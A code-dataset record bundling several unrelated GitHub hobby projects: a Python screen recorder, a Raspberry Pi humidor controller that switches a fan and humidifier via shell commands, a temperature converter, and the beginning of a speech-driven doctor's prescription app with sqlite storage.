tex+ext\n\t\t#Retornamos nombre\n\t\treturn nombre\n\n\n\tdef screen_shot(self):\n\t\t#Este metodo toma una fotografia y la guarda en el directorio\n\t\t#Para el nombre llamamos a nuestro metodo 'Archivo' y ver si es unico\n\t\t#O si tenemos mas archivos con el mismo nombre\n\t\tpyautogui.screenshot(self.Archivo('captura_pantalla', '.jpg'))\n\n\n\tdef Tiempo(self):\n\t\tself.time['text'] = str(self.FormatoHora(self.hora)) + str(self.FormatoHora(self.minutos)) + str(self.FormatoHora(self.segundos)) \n\t\tself.segundos += 1\n\t\tif self.segundos == 60:\n\t\t\tself.segundos = 0\n\t\t\tself.minutos += 1\n\t\tif self.minutos == 60:\n\t\t\tself.minutos = 0\n\t\t\tself.hora += 1\n\t\t#\t-DESFACE-\n\t\tself.proceso = self.time.after(886, self.Tiempo)\t\n\n\n\n\tdef EstadoGrabacion(self):\n\t\tif self.grabando == True:\n\t\t\tself.grabando = False\n\t\t\tself.time.after_cancel(self.proceso)\n\t\t\tself.LimpiarContadores()\n\t\telse:\n\t\t\tself.grabando = True\n\t\t\tself.btn_grabar.configure(text=\"Pausa\")\n\t\t\tt1 = threading.Thread(target= lambda:self.Grabar())\n\t\t\tt2 = threading.Thread(target=lambda:self.Tiempo())\n\t\t\tt1.start()\n\t\t\tt2.start()\t\n\n\n\tdef BuscarDirectorio(self):\n\t\tself.directorio = filedialog.askdirectory()\n\t\tif self.directorio != \"\":\n\t\t\tos.chdir(self.directorio)\n\n\n\n\tdef Grabar(self):\n\t\tself.salida = cv2.VideoWriter(self.Archivo(\"Video\", \".mp4\"), self.fourcc, 20.0,(self.ObtenerPantalla()))\n\t\twhile self.grabando == True:\n\t\t\timg = pyautogui.screenshot()\n\t\t\tframe_ = np.array(img)\n\t\t\tframe_ = cv2.cvtColor(frame_,cv2.COLOR_BGR2RGB)\n\t\t\tself.salida.write(frame_)\n\t\tself.btn_grabar.configure(text=\"Grabar\")\n\t\tself.salida.release()\t\n\n\n\n\n\tdef PintarInterfaz(self):\n\t\tself.label = Label(self.frame, relief=\"flat\", 
text=\"Grabadora de Pantalla\",bg=\"gray\", font=(\"\",\"15\"))\n\t\tself.label.pack(padx=10,pady=1)\n\t\tself.time = Label(self.frame, fg='black', width=22, text=\"00:00:00\", bg=\"gray\", font=(\"\",\"14\"))\n\t\tself.time.pack()\n\t\tself.btn_grabar = Button(self.frame,text=\"Grabar\", relief=\"ridge\", borderwidth=2, overrelief=\"flat\",bg=\"white\",fg=\"black\",width=8,command= lambda:self.EstadoGrabacion())#gray66\n\t\tself.btn_grabar.place(x=20,y=60, width=175)\n\t\tself.shoot = Button(self.frame,text=\"Capura de Pantalla\", relief=\"ridge\", borderwidth=2, overrelief=\"flat\",bg=\"white\",fg=\"black\",width=8,command= lambda:self.screen_shot())\n\t\tself.shoot.place(x=20,y=90, width=175)\n\t\tself.folder = Button(self.frame, text=\"Seleccionar Archivo\", relief=\"ridge\", borderwidth=2, overrelief=\"flat\",bg=\"white\",width=10,command= lambda:self.BuscarDirectorio())\n\t\tself.folder.place(x=20,y=120, width=175)\n\n\nroot = Tk()\nroot.geometry(\"220x170\")\nroot.config(bg=\"gray\")\nroot.title(\"Olsgrab\")\naplication = Grabadora(root)\nroot.mainloop()"
},
{
"alpha_fraction": 0.7207792401313782,
"alphanum_fraction": 0.7229437232017517,
"avg_line_length": 34.38461685180664,
"blob_id": "ae80675b69056a5b19135d0e37622732f8281251",
"content_id": "3c6651400665e979275479ed48978dafdf78bf02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 462,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 13,
"path": "/README.md",
"repo_name": "Olivers11/Grabadora-Python",
"src_encoding": "UTF-8",
"text": "# Grabadora-Python\nCaptura pantalla de la PC con python\nrequerimienos:\n cv2\n glob\n numpy \n pyautogui\n ------------------------------\n Estos paquetes no vienen agregados a python, para tenerlos solo debes\n escribir en cmd -- pip install \"nombre del paquete\"\n Puedes agregarle formato al timer de igual manera en la funcion 'FormatoHora()'\n Para mejorar la interfaz debes, modificar los estilos y widgets en el metodo 'PintarInterfaz()'\n Dejame una estrella! :(\n \n"
}
] | 2 |
BrightlyTechnologies/HumidorPi | https://github.com/BrightlyTechnologies/HumidorPi | c7401c0e8e2cb99cac9fca7a8c49db79a1a90f3f | 1d685057f34c02439a08ce8b2186308d667e1517 | fdefaa68e6a9d0eb359bec451f4e06367746217a | refs/heads/master | 2020-03-17T02:10:44.226383 | 2017-05-13T21:22:09 | 2017-05-13T21:22:09 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5295315384864807,
"alphanum_fraction": 0.5412423610687256,
"avg_line_length": 28.53383445739746,
"blob_id": "e5bcdbdc34cbd7727539bbf8c0ebba1629194985",
"content_id": "97fc5b152fe6a7ac0365854f38f7a520cb58fd15",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3928,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 133,
"path": "/version1_0/humidorpi.py",
"repo_name": "BrightlyTechnologies/HumidorPi",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python\n\n#This script is deprecated!!!!\n\n##################################\n### Imports ###\n##################################\n\nimport json\nimport sys\nimport time\nimport datetime\nimport Adafruit_DHT\nimport os\nimport traceback\nfrom ISStreamer.Streamer import Streamer\n\n###################################\n### Sensor ###\n###################################\nDHT_TYPE = Adafruit_DHT.AM2302\nDHT_PIN = 4\n\n###################################\n### Variables ###\n###################################\nstreamer = Streamer(bucket_name=\"Humidor\", bucket_key=\"bucket-key-goes-here\", access_key=\"access-key-goes-here\")\nFREQUENCY_SECONDS = 30\nstaleHumidity = None\nstaleTemp = None\nfanControl = False\nhumControl = False\nmsgControl = 0\n\n####################################\n### CONTROL ###\n####################################\ncontrolHumidity = 80\n\n# Turn off the fan & humidifier\nos.system('ykushcmd -d 1')\nos.system('ykushcmd -d 2')\nstreamer.log(\"Fan\", \"OFF\")\nstreamer.log(\"Humidifier\", \"OFF\")\nstreamer.log(\"Status\", \"Idle\")\n# DO NOT POWER OFF 3 = WiFi Module!\n\nprint('Logging sensor measurements to ISS every {0} seconds.'.format(FREQUENCY_SECONDS))\nprint('Press Ctrl-C to quit.')\n\ntry:\n while True:\n if msgControl != 0:\n\t msgControl = 0\n streamer.log(\"My Messages\", \"Monitoring Humidity\")\n\telif msgControl == 0:\n\t streamer.log(\"My Messages\", \"Monitoring Humidity\")\n\n humidity, temp = Adafruit_DHT.read(DHT_TYPE, DHT_PIN)\n\n if humidity is None or temp is None:\n time.sleep(2)\n\t continue\n temp = round(temp * 1.8 + 32)\n humidity = round(humidity)\n\n if staleHumidity is None or staleTemp is None:\n staleHumidity = humidity\n\t staleTemp = temp\n\t print('H & T = None')\n\n print('Temperature: {0:0.1f} F'.format(temp))\n print('Humidity: {0:0.1f} %'.format(humidity))\n \n time.sleep(2)\n\n if humidity == staleHumidity:\n \t print('Humidity No Change - Skipping ISS Update')\n\t streamer.log(\"Status\", \"Skipped\")\n time.sleep(2)\n else:\n\t staleHumidity = humidity\n\t staleTemp = temp\n print('Sending to ISS')\n\t if msgControl != 1:\n\t msgControl = 1\n\t streamer.log(\"My Messages\", \"Received Update\")\n\t streamer.log(\"Humidity\", int(humidity))\n\t streamer.log(\"Temperature\", int(temp))\n\t time.sleep(2)\n\n if int(humidity) < int(controlHumidity):\n \t if fanControl != True and humControl != True:\n os.system('ykushcmd -u 1')\n os.system('ykushcmd -u 2')\n\t fanControl = True\n\t humControl = True\n\t streamer.log(\"Fan\", \"ON\")\n streamer.log(\"Humidifier\", \"ON\")\n\t if msgControl != 2:\n\t msgControl = 2\n\t streamer.log(\"Status\", \"Increasing Humidity\")\n elif int(humidity) > int(controlHumidity):\n\t if fanControl != True and humControl != False:\n os.system('ykushcmd -u 1')\n os.system('ykushcmd -d 2')\n\t fanControl = True\n\t humControl = False\n\t streamer.log(\"Fan\", \"ON\")\n streamer.log(\"Humidifier\", \"OFF\")\n\t if msgControl != 3:\n\t msgControl = 3\n\t streamer.log(\"Status\", \"Circulating Air\")\n else:\n\t if fanControl != False and humControl != False:\n os.system('ykushcmd -d 1')\n os.system('ykushcmd -d 2')\n\t fanControl = False\n\t humControl = False\n\t streamer.log(\"Fan\", \"OFF\")\n streamer.log(\"Humidifier\", \"OFF\")\n\t if msgControl != 4:\n\t msgControl = 4\n\t streamer.log(\"Status\", \"Idle\")\n\tstreamer.close()\n\ttime.sleep(FREQUENCY_SECONDS)\n\nexcept KeyboardInterrupt:\n\tprint \"Shutdown requested...exiting\"\n\tstreamer.close()\nexcept 
Exception:\n\ttraceback.print_exc(file=sys.stdout)\nsys.exit(0)\n"
},
{
"alpha_fraction": 0.5991877913475037,
"alphanum_fraction": 0.6103553175926208,
"avg_line_length": 31.189542770385742,
"blob_id": "da9d1dbf08e8d21d54396b127ffd736dc6a8843f",
"content_id": "03b54269cdd5978c08dfbc8eaf9a6ad0d8ba24e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4925,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 153,
"path": "/humidorpi.py",
"repo_name": "BrightlyTechnologies/HumidorPi",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python\n\n##################################\n### Imports ###\n##################################\n\nimport json\nimport sys\nimport time\nimport datetime\nimport subprocess\nimport traceback\nimport Adafruit_DHT\nfrom ISStreamer.Streamer import Streamer\n\n##################################\n### Sensor ###\n##################################\nDHT_TYPE = Adafruit_DHT.AM2302\nDHT_PIN = 4\n\n##################################\n### Variables ###\n##################################\nstreamer = Streamer(bucket_name=\"Humidor\", bucket_key=\"bucket-key-goes-here\", access_key=\"access-key-goes-here\", buffer_size=200, debug_level=1)\nFREQUENCY_SECONDS = 300\nstaleHumidity = None\nstaleTemp = None\nstatusControl = 0\n\n##################################\n### CONTROL ###\n##################################\ncontrolHumidity = 80\n\n# Turn on the fan & turn off the humidifier\nsubprocess.call(\"ykushcmd -u 1\", shell=True)\nsubprocess.call(\"ykushcmd -u 2\", shell=True)\n\nprint('Logging sensor measurements to ISS every {0} seconds.'.format(FREQUENCY_SECONDS))\nprint('Press Ctrl-C to quit.')\n\nprint('entering main try')\ntry:\n\tprint('entering main while loop')\n\tprint(time.strftime('%a %H:%M:%S'))\n\tstreamer.log(\"My Messages\", \"Starting Main Loop\")\n\ttime.sleep(5)\n\twhile True:\n\t\tprint('posting Monitoring Humidity')\n\t\tprint('retrieving humidity')\n\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\thumidity, temp = Adafruit_DHT.read(DHT_TYPE, DHT_PIN)\n\n\t\tprint('making sure there were readings')\n\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\twhile humidity is None or temp is None:\n\t\t\tif statusControl != 3:\n\t\t\t\tstreamer.log(\"Status\", \"No Reading\")\n\t\t\t\tstatusControl = 3\n\t\t\tprint('failed to get readings')\n\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\ttime.sleep(5)\n\t\t\thumidity, temp = Adafruit_DHT.read(DHT_TYPE, DHT_PIN)\n\t\tprint('got readings')\n\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\ttemp = round(temp * 1.8 + 32)\n\t\thumidity = round(humidity)\n\t\tif staleHumidity is None:\n\t\t\tif int(humidity) < int(controlHumidity):\n\t\t\t\tstaleHumidity = int(humidity) + 1\n\t\t\telif int(humidity) > int(controlHumidity):\n\t\t\t\tstaleHumidity = int(humidity) - 1\n\t\t\telse:\n\t\t\t\tstaleHumidity = humidity\n\t\tprint('Temperature: {0:0.1f} F'.format(temp))\n\t\tprint('Humidity: {0:0.1f} %'.format(humidity))\n\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\ttime.sleep(2)\n\t\tif humidity == staleHumidity:\n\t\t\tprint('Humidity No Change - Skipping ISS Update')\n\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\ttime.sleep(2)\n\t\telse:\n\t\t\tprint('Change in Humidity')\n\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\tstaleHumidity = humidity\n\t\t\tstaleTemp = temp\n\t\t\tprint('Sending to ISS')\n\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\tstreamer.log(\"Humidity\", int(humidity))\n\t\t\tstreamer.log(\"Temperature\", int(temp))\n\t\t\ttime.sleep(10)\n\t\t\tprint('Testing humidity')\n\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\tif int(humidity) < int(controlHumidity):\n\t\t\t\tprint('Humidity less than control')\n\t\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\t\tsubprocess.call(\"ykushcmd -u 1\", shell=True)\n\t\t\t\tprint('Turning on Fan')\n\t\t\t\tsubprocess.call(\"ykushcmd -u 2\", shell=True)\n\t\t\t\tprint('Turning on Humidifier')\n\t\t\t\tif statusControl != 3:\n\t\t\t\t\tstatusControl = 3\n\t\t\t\t\tstreamer.log(\"Status\", \"Increasing Humidity\")\n\t\t\t\t\tstreamer.log(\"Fan\", 
\"ON\")\n\t\t\t\t\tstreamer.log(\"Humidifier\", \"ON\")\n\t\t\t\tprint('Testing complete')\n\t\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\telif int(humidity) > int(controlHumidity):\n\t\t\t\tprint('Humidity above control')\n\t\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\t\tsubprocess.call(\"ykushcmd -u 1\", shell=True)\n\t\t\t\tprint('Turning on Fan')\n\t\t\t\tsubprocess.call(\"ykushcmd -d 2\", shell=True)\n\t\t\t\tprint('Turning off Humidifier')\n\t\t\t\tif statusControl != 4:\n\t\t\t\t\tstatusControl = 4\n\t\t\t\t\tstreamer.log(\"Status\", \"Circulating Air\")\n\t streamer.log(\"Fan\", \"ON\")\n\t streamer.log(\"Humidifier\", \"OFF\")\n\t\t\t\tprint('Testing complete')\n\t\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\telse:\n\t\t\t\tprint('Humidity at control')\n\t\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\t\tsubprocess.call(\"ykushcmd -d 1\", shell=True)\n\t\t\t\tprint('Turning off Fan')\n\t\t\t\tsubprocess.call(\"ykushcmd -d 2\", shell=True)\n\t\t\t\tprint('Turning off Humidifier')\n\t\t\t\tif statusControl != 5:\n\t\t\t\t\tstatusControl = 5\n\t\t\t\t\tstreamer.log(\"Status\", \"Idle\")\n\t\t\t\t\tstreamer.log(\"Fan\", \"OFF\")\n\t\t\t\t\tstreamer.log(\"Humidifier\", \"OFF\")\n\t\t\t\tprint('Testing complete')\n\t\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\tstreamer.flush()\n\t\tstreamer.log(\"My Messages\", \"Last Updated\")\n\t\tif statusControl == 3:\n\t\t\ttime.sleep(int(round(FREQUENCY_SECONDS / 2)))\n\t\telif statusControl == 4:\n\t\t\ttime.sleep(FREQUENCY_SECONDS)\n\t\telse:\n\t\t\ttime.sleep(int(round(FREQUENCY_SECONDS * 2)))\nexcept KeyboardInterrupt:\n\tprint \"Shutdown requested...exiting\"\n\tstreamer.log(\"My Messages\", \"Pi Shutting Down\")\n\tstreamer.log(\"Status\", \"Going Down\")\n\tstreamer.close()\nexcept Exception:\n\ttraceback.print_exc(file=sys.stdout)\nsys.exit(0)\n"
},
{
"alpha_fraction": 0.7956015467643738,
"alphanum_fraction": 0.8059508204460144,
"avg_line_length": 153.60000610351562,
"blob_id": "1b7794df0f7641da26e8f3f77354ec31b053b4d1",
"content_id": "77434d23dc1aa06490b051e81333f86aa5baaa5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 773,
"license_type": "no_license",
"max_line_length": 293,
"num_lines": 5,
"path": "/README.md",
"repo_name": "BrightlyTechnologies/HumidorPi",
"src_encoding": "UTF-8",
"text": "# HumidorPi\nThis is a DIY project to modify a cigar humidor and enable it to be \"self monitoring\" by using the following hardware: Raspberry Pi, Adafruit Sensor AM2302, Yepkit USB Smart Hub, Centrifugal Fan, and Ultrasonic Humidifier.<br>\nWith this the Raspberry Pi will receive real humidity readings from the AM2302 sensor, and based on set thresholds will send control commands via command line to the Yepkit USB Smart Hub (or YKUSH for short) to enable/disable power to the connected Centrifugal Fan & Ultrasonic Humidifier.<br>\nAll the while the Raspberry Pi will be reporting back to Initial State to allow for abroad status readings & history tracking.<br>\nThe control program will be written in Python and utilize shell commands in order to control the YKUSH unit.\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.760869562625885,
"avg_line_length": 22,
"blob_id": "dff4fd819a7b813d45d4ff486e9585a3deaea9a4",
"content_id": "bdcf72a944624229902e9ab079c5900440a1682d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 8,
"path": "/launcher.sh",
"repo_name": "BrightlyTechnologies/HumidorPi",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n#This is a simple launcher script that can be added to crontab to kick off the HumidorPi script on startup\n\ncd /\ncd home/pi/HumidorPi/\nsleep 30\nsudo python humidorpi.py\ncd /\n"
}
] | 4 |
sky-ridz/Python | https://github.com/sky-ridz/Python | e757f9ccb4540dfa4a92a1edc5c5386b35c404bc | 3e44c51113b2742e797bdf568ba9e9897d91e768 | 1bd63d29f0f519c9824f04a3f4d2fe9435b34bab | refs/heads/master | 2020-07-23T19:29:47.255259 | 2016-08-29T12:09:41 | 2016-08-29T12:09:41 | 66,840,133 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6201550364494324,
"alphanum_fraction": 0.6511628031730652,
"avg_line_length": 23.799999237060547,
"blob_id": "7c9be4af03da3a70e8b3909cc8788c7c794cc9c8",
"content_id": "f44e2a089e3053a502aa34adffd457e551d64b94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 5,
"path": "/celsius to farenheit2.py",
"repo_name": "sky-ridz/Python",
"src_encoding": "UTF-8",
"text": "x= input(\"write the temp in celsius:\")\r\nc=int(x)\r\nf=9/5*c+32\r\nprint(\"the temp in farenheit is:\",f)\r\ninput(\"press enter to end\")\r\n"
}
] | 1 |
RitikPatle/DrTalk-Minor2-Windows- | https://github.com/RitikPatle/DrTalk-Minor2-Windows- | e46e2bdb34ed00d613a8c1b87a3d7bbf130fb773 | f9b0b1a6108436f4a941ccd27d57c7829efd7382 | 784e60dc0e20997a3cad3499632b644c4613dd44 | refs/heads/master | 2023-05-09T18:23:27.182751 | 2021-05-12T09:40:33 | 2021-05-12T09:40:33 | 366,663,883 | 2 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5761580467224121,
"alphanum_fraction": 0.6223418712615967,
"avg_line_length": 37.07322311401367,
"blob_id": "efc059821b3f7c7945b5bd6e2f181fe6957b1d71",
"content_id": "a67d3e954b86bbb57f76aa88530935ab34e05f70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 36398,
"license_type": "no_license",
"max_line_length": 340,
"num_lines": 956,
"path": "/drtalk.py",
"repo_name": "RitikPatle/DrTalk-Minor2-Windows-",
"src_encoding": "UTF-8",
"text": "from tkinter import *\nimport sqlite3\nimport pyttsx3\nimport speech_recognition as sr\nimport os,sys\nfrom docx import Document\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\nfrom docx.shared import Cm , RGBColor , Inches\nfrom docx.shared import Pt \nimport datetime\nimport re\nfrom tkinter import messagebox\n\nwindow = Tk()\nwindow.title('DrTalk')\nwindow.wm_state('zoomed') #to open window in maximize mode\nwindow.resizable(0,0) #to disable the Restore Down button\nwindow.configure(background='#ffffff') #to provide a background\n\niconvar = PhotoImage(file='icon.gif') #to give icon\nwindow.iconphoto(True,iconvar) #to give icon\n\nlogovar = PhotoImage(file='logo.gif') #to use logo\nlogo = Label(window,image=logovar) #to use logo\nlogo.place(x=-2,y=0) #to use logo\n\ndef SpeakText(sentence):\n engine = pyttsx3.init()\n engine.say(sentence)\n engine.runAndWait()\n\ndef ListenText():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print('I am listening')\n r.adjust_for_ambient_noise(source,duration=1)\n audio = r.listen(source)\n try:\n lisningvar = r.recognize_google(audio)\n except sr.UnknownValueError:\n lisningvar = ''\n return lisningvar\n\ndef cnvp(NaMe,GeNder,DoBi,PhNu,eID,REGnO,ExPerI,ClNc,DGre,UsRnme,PaSSwD,AoNE,AtWO,AtRE):\n pname = StringVar()\n pgendr = StringVar()\n page = StringVar()\n sympt = StringVar()\n diag = StringVar()\n pres = StringVar()\n adv = StringVar()\n \n def storeprescrip():\n prescripdoc = Document()\n\n RESC=prescripdoc.add_paragraph(\"\")\n RESC.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n cLNC=RESC.add_run(f\"\"\"{ClNc}\\n\"\"\")\n cLNC.font.size=Pt(20)\n cLNC.font.color.rgb=RGBColor(0,111,80)\n\n pNAM=RESC.add_run(\"\"\"Patient's Name: \"\"\")\n pNAM.font.size=Pt(16)\n #pNAM.font.color.rgb=RGBColor(0,0,0)\n\n pNAME=RESC.add_run(f\"\"\"{pname.get()}\\n\"\"\")\n pNAME.font.size=Pt(16)\n pNAME.font.color.rgb=RGBColor(0,111,80)\n\n pGEN=RESC.add_run(\"\"\"Gender: \"\"\")\n pGEN.font.size=Pt(16)\n #pGEN.font.color.rgb=RGBColor(0,0,0)\n\n pGEND=RESC.add_run(f\"\"\"{pgendr.get()}\\t\\t\"\"\")\n pGEND.font.size=Pt(16)\n pGEND.font.color.rgb=RGBColor(0,111,80)\n\n pAG=RESC.add_run(\"\"\"Age: \"\"\")\n pAG.font.size=Pt(16)\n #pAG.font.color.rgb=RGBColor(0,0,0)\n\n pAGE=RESC.add_run(f\"\"\"{page.get()}\"\"\")\n pAGE.font.size=Pt(16)\n pAGE.font.color.rgb=RGBColor(0,111,80)\n\n pRESC=prescripdoc.add_paragraph(\"\")\n pRESC.alignment = WD_ALIGN_PARAGRAPH.LEFT\n\n sYMPH=pRESC.add_run(\"\"\"Symptoms:\\n\"\"\")\n sYMPH.font.size=Pt(16)\n #sYMPH.font.color.rgb=RGBColor(0,0,0)\n\n sYMPT=pRESC.add_run(f\"\"\"{SymptomS.get(\"1.0\",'end-1c')}\\n\"\"\")\n sYMPT.font.size=Pt(14)\n sYMPT.font.color.rgb=RGBColor(0,111,80)\n\n dIAGH=pRESC.add_run(\"\"\"Diagnosis:\\n\"\"\")\n dIAGH.font.size=Pt(16)\n #dIAGH.font.color.rgb=RGBColor(0,0,0)\n\n dIAGT=pRESC.add_run(f\"\"\"{DiagnosiS.get(\"1.0\",'end-1c')}\\n\"\"\")\n dIAGT.font.size=Pt(14)\n dIAGT.font.color.rgb=RGBColor(0,111,80)\n\n pRESH=pRESC.add_run(\"\"\"Prescription:\\n\"\"\")\n pRESH.font.size=Pt(16)\n #pRESH.font.color.rgb=RGBColor(0,0,0)\n\n pREST=pRESC.add_run(f\"\"\"{PrescriptioN.get(\"1.0\",'end-1c')}\\n\"\"\")\n pREST.font.size=Pt(14)\n pREST.font.color.rgb=RGBColor(0,111,80)\n\n aDVCH=pRESC.add_run(\"\"\"Advice:\\n\"\"\")\n aDVCH.font.size=Pt(16)\n #aDVCH.font.color.rgb=RGBColor(0,0,0)\n\n aDVCT=pRESC.add_run(f\"\"\"{AdvicE.get(\"1.0\",'end-1c')}\\n\"\"\")\n aDVCT.font.size=Pt(14)\n aDVCT.font.color.rgb=RGBColor(0,111,80)\n\n pLABEL=pRESC.add_run(\"\"\"Prescribed by,\\n\"\"\")\n pLABEL.font.size=Pt(16)\n 
#pLABEL.font.color.rgb=RGBColor(0,0,0)\n\n dNAME=pRESC.add_run(f\"\"\"{NaMe}\\n\"\"\")\n dNAME.font.size=Pt(16)\n dNAME.font.color.rgb=RGBColor(0,111,80)\n\n dRGN=pRESC.add_run(\"\"\"Registration No.: \"\"\")\n dRGN.font.size=Pt(14)\n #dRGN.font.color.rgb=RGBColor(0,0,0)\n\n dRGNO=pRESC.add_run(f\"\"\"{REGnO}\\n\"\"\")\n dRGNO.font.size=Pt(14)\n dRGNO.font.color.rgb=RGBColor(0,111,80)\n\n dDGRE=pRESC.add_run(f\"\"\"{DGre}\\n\"\"\")\n dDGRE.font.size=Pt(14)\n dDGRE.font.color.rgb=RGBColor(0,111,80)\n\n dEX=pRESC.add_run(\"\"\"Experience: \"\"\")\n dEX.font.size=Pt(14)\n #dEX.font.color.rgb=RGBColor(0,0,0)\n\n dEXP=pRESC.add_run(f\"\"\"{ExPerI}y\\t\"\"\")\n dEXP.font.size=Pt(14)\n dEXP.font.color.rgb=RGBColor(0,111,80)\n\n dPH=pRESC.add_run(\"\"\"Phone No.: \"\"\")\n dPH.font.size=Pt(14)\n #dPH.font.color.rgb=RGBColor(0,0,0)\n\n dPHN=pRESC.add_run(f\"\"\"{PhNu}\\n\"\"\")\n dPHN.font.size=Pt(14)\n dPHN.font.color.rgb=RGBColor(0,111,80)\n\n dEI=pRESC.add_run(\"\"\"Email Id: \"\"\")\n dEI.font.size=Pt(14)\n #dEI.font.color.rgb=RGBColor(0,0,0)\n\n dEID=pRESC.add_run(f\"\"\"{eID}\\n\"\"\")\n dEID.font.size=Pt(14)\n dEID.font.color.rgb=RGBColor(00,111,80)\n\n dAT=pRESC.add_run(\"\"\"On Date: \"\"\")\n dAT.font.size=Pt(14)\n #dAT.font.color.rgb=RGBColor(0,0,0)\n\n dATE=pRESC.add_run(f\"\"\"{datetime.datetime.now().strftime('%d/%b/%Y')}\\t\"\"\")\n dATE.font.size=Pt(14)\n dATE.font.color.rgb=RGBColor(00,111,80)\n\n tIM=pRESC.add_run(\"\"\"At Time: \"\"\")\n tIM.font.size=Pt(14)\n #tIM.font.color.rgb=RGBColor(0,0,0)\n\n tIME=pRESC.add_run(f\"\"\"{datetime.datetime.now().strftime('%I:%M:%S %p')}\"\"\")\n tIME.font.size=Pt(14)\n tIME.font.color.rgb=RGBColor(00,111,80)\n\n currentdtinfo = datetime.datetime.now()\n docdtinfo = currentdtinfo.strftime('%Y%b%d%H%M%S')\n prscdocnme = f'{docdtinfo}{pname.get()}'\n prescripdoc.save(f'Prescriptions\\{prscdocnme}.docx')\n \n pdb = sqlite3.connect('drtalk')\n pcr = pdb.cursor()\n pcr.execute(\"\"\"create table if not exists ps(Name VARCHAR,Gender VARCHAR,Age VARCHAR,Symptoms VARCHAR,Diagnosis VARCHAR,Prescription VARCHAR,Advice VARCHAR,DrregNO VARCHAR,Prscrpnme VARCHAR)\"\"\")\n pcr.execute(\"\"\"insert into ps VALUES(?,?,?,?,?,?,?,?,?)\"\"\",(pname.get(), pgendr.get(), page.get(), SymptomS.get(\"1.0\",'end-1c'), DiagnosiS.get(\"1.0\",'end-1c'), PrescriptioN.get(\"1.0\",'end-1c'), AdvicE.get(\"1.0\",'end-1c'),REGnO,prscdocnme))\n pdb.commit()\n pdb.close()\n VpLisnwndw.destroy()\n \n def lISten():\n SpeakText('Name')\n sname = ListenText()\n pName.insert(0,sname)\n\n SpeakText('Gender')\n srgndr = ListenText()\n pGender.insert(0,srgndr)\n\n SpeakText('Age')\n srage = ListenText()\n pAge.insert(0,srage)\n\n SpeakText('Symptoms')\n srsympt = ListenText()\n SymptomS.insert(0.0,srsympt)\n\n SpeakText('Diagnosis')\n srdiag = ListenText()\n DiagnosiS.insert(0.0,srdiag)\n\n SpeakText('Prescription')\n srpresc = ListenText()\n PrescriptioN.insert(0.0,srpresc)\n\n SpeakText('Advice')\n sradv = ListenText()\n AdvicE.insert(0.0,sradv)\n\n VpLisnwndw = Toplevel(bg='#ffffff')\n VpLisnwndw.wm_state('zoomed')\n VpLisnwndw.resizable(0,0)\n\n pInfO = LabelFrame(VpLisnwndw,text='Patient Information:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=125,width=1535)\n pInfO.place(x=0,y=5)\n\n pNamE = Label(pInfO,background='white',text='Name:',font='-size 18')\n pNamE.place(x=5,y=5)\n\n pName = Entry(pInfO,background='#ffffff',textvariable=pname,font='-size 17',width=110)\n pName.place(x=85,y=7)\n\n pGendeR = Label(pInfO,background='white',text='Gender:',font='-size 18')\n 
pGendeR.place(x=5,y=45)\n\n pGender = Entry(pInfO,background='#ffffff',textvariable=pgendr,font='-size 17',width=10)\n pGender.place(x=105,y=47)\n\n pAgE = Label(pInfO,background='white',text='Age:',font='-size 18')\n pAgE.place(x=265,y=45)\n\n pAge = Entry(pInfO,background='#ffffff',textvariable=page,font='-size 17',width=3)\n pAge.place(x=325,y=47)\n\n SymPtomS = Label(VpLisnwndw,background='white',text='Symptoms:',font='-size 18')\n SymPtomS.place(x=5,y=135)\n\n SymptomS = Text(VpLisnwndw,font='-size 17',bg='#ffffff',height=5,width=117)\n SymptomS.place(x=5,y=170)\n\n DiaGnosiS = Label(VpLisnwndw,background='white',text='Diagnosis:',font='-size 18')\n DiaGnosiS.place(x=5,y=305)\n \n DiagnosiS = Text(VpLisnwndw,font='-size 17',bg='#ffffff',height=5,width=117)\n DiagnosiS.place(x=5,y=338)\n\n PreScriptioN = Label(VpLisnwndw,background='white',text='Prescription:',font='-size 18')\n PreScriptioN.place(x=5,y=470)\n\n PrescriptioN = Text(VpLisnwndw,font='-size 17',bg='#ffffff',height=5,width=117)\n PrescriptioN.place(x=5,y=500)\n\n AdVicE = Label(VpLisnwndw,background='white',text='Advice:',font='-size 18')\n AdVicE.place(x=5,y=634)\n\n 